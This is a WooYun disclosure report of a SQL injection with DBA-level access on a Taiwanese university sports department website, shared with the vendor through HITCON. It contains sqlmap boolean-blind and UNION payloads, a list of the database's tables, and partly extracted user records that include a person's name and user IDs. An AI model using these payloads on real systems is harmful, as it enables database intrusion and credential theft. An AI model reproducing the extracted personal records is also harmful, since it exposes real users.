当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158663

漏洞标题:國立台中教育大學體育系存在SQL注入/DBA权限(臺灣地區)

相关厂商:國立台中教育大學

漏洞作者: 路人甲

提交时间:2015-12-07 10:16

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

RT

详细说明:

注入点:http://**.**.**.**/index.php?fn=news&fn1=detail&no=285&no5=C

sqlmap identified the following injection point(s) with a total of 100 HTTP(s) requests:
---
Parameter: no (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fn=news&fn1=detail&no=285 AND 9559=9559&no5=C
    Type: UNION query
    Title: MySQL UNION query (14) - 11 columns
    Payload: fn=news&fn1=detail&no=-7065 UNION ALL SELECT 14,CONCAT(0x7178787a71,0x525074796575674d7456,0x7162706271),14,14,14,14,14,14,14,14,14#&no5=C
---
web server operating system: Linux Fedora
web application technology: Apache 2.2.19, PHP 5.3.6
back-end DBMS: MySQL >= 5.0.0
current database:    'NTCU'
current user is DBA:    True
available databases [4]:
[*] information_schema
[*] mysql
[*] NTCU
[*] performance_schema


表:

back-end DBMS: MySQL 5
Database: NTCU
[68 tables]
+--------------+
| ABOUT        |
| AIRCRAFT     |
| ASK          |
| BILLPIC      |
| BINEWS       |
| BPRODID      |
| CALENDER     |
| CARDLOVE     |
| CARDSTYLE    |
| CARDTOMAIL   |
| CHANGEITEM   |
| CITEM        |
| CODIFICATION |
| COMPANY      |
| CPRODID      |
| DATAS        |
| DISORID      |
| DISSAY       |
| DOWN         |
| DOWNCATE     |
| DOWNFILE     |
| EMAN         |
| EPACIL       |
| EPAPER       |
| EPAPROCIL    |
| EPASENDS     |
| EPATOMAIL    |
| EPA_PROD     |
| EVABPRID     |
| EVACPRID     |
| EVADOWN      |
| FACTORY      |
| GRPSELK      |
| IMPROERR     |
| INDPIC       |
| INFORMATION  |
| JOIN1        |
| JOINACTIVE   |
| JOINOTHMSG   |
| JOINPAPER    |
| MARK         |
| MSG          |
| MSGTOMAIL    |
| NEWS2        |
| OTHMSG       |
| PAPER_ST     |
| SENDINTURN   |
| SEP          |
| STKIND       |
| SYSCUST      |
| SYSPAYKIND   |
| SYSTEMSET    |
| SYSUSER2     |
| USERGROUP    |
| USERINGROUP  |
| USERLOG      |
| USER_COL     |
| USER_DCOL    |
| USER_DTL     |
| VOTECIL      |
| VOTEPA       |
| VOTESENDS    |
| VOTETIL      |
| VOTETOMAIL   |
| VOTE_RE      |
| VOTE_SUB     |
| VOTE_SUBL    |
| USER         |
+--------------+


表太多没仔细看,看了一个user表

Table: USER
[5 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| email    | non-numeric |
| jobid    | non-numeric |
| name     | non-numeric |
| userid   | non-numeric |
| userpass | non-numeric |
+----------+-------------+

部分数据:

[21:12:03] [INFO] retrieved: willianman@**.**.**.**
[21:12:03] [INFO] retrieving the length of query output
[21:12:03] [INFO] retrieved: 10
[21:12:22] [INFO] retrieved: willianman
[21:12:22] [INFO] retrieving the length of query output
[21:12:22] [INFO] retrieved: 19
[21:12:44] [INFO] retrieved: owl3316@**.**.**.**
[21:12:44] [INFO] retrieving the length of query output
[21:12:44] [INFO] retrieved: 1
[21:12:47] [INFO] retrieved: N
[21:12:52] [INFO] retrieving the length of query output
[21:12:52] [INFO] retrieved: 3
[21:14:18] [INFO] retrieved: 廖彥涵
[21:14:18] [INFO] retrieving the length of query output
[21:14:18] [INFO] retrieved: 19
[21:14:46] [INFO] retrieved: owl3316@**.**.**.**
[21:14:46] [INFO] retrieving the length of query output
[21:14:46] [INFO] retrieved: 7
[21:15:02] [INFO] retrieved: owl3316


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-08 19:52

厂商回复:

感謝通報

最新状态:

暂无